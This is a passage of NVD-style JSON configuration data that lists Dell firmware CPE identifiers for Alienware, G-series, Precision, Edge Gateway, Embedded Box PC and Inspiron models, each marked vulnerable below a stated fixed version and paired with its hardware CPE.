"AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_x16_r1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_x16_r1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_x16_r2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_x16_r2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:chengming_3900_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:chengming_3900:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:chengming_3910_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:chengming_3910:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:chengming_3911_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:chengming_3911:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:chengming_3990_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:chengming_3990:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:chengming_3991_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:chengming_3991:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:edge_gateway_5000_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:edge_gateway_5000:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g15_5510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g15_5510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g15_5511_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g15_5511:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g15_5520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g15_5520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g15_5530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g15_5530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g16_7620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g16_7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g16_7630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g16_7630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g3_3500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g3_3500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g5_5000_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g5_5000:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g5_5090_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g5_5090:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g5_5500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g5_5500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g7_7500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g7_7500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g7_7700_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g7_7700:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3430_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3430_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3431_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3431_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3630_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3630_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5820_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5820_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7820_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.39.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7820_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7920_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.39.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7920_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:edge_gateway_3000_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.17.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:edge_gateway_3000:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:embedded_box_pc_3000_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:embedded_box_pc_3000:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:embedded_box_pc_5000_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:embedded_box_pc_5000:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_13_5310_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_13_5310:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_13_5320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.17.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_13_5320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_13_5330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_13_5330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_5410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_5410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_5418_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_5418:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_5420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_5420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_5430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_5430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_5440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_5440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_7420_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.18.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_7420_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_7430_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_7430_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_7440_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_7440_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_plus_7420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_plus_7420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_14_plus_7430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_14_plus_7430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_15_3511_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_15_3511:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_15_3520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.22.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_15_3520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_15_3530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_15_3530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_15_5510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_15_5510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_15_5518_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_15_5518:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_15_7510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.22.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_15_7510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_5620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_5620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_5630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_5630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_5640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_5640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_7610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.22.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_7610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_7620_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.18.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_7620_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_7630_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_7630_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_plus_7620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_plus_7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_16_plus_7630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_16_plus_7630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_24_5410_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : 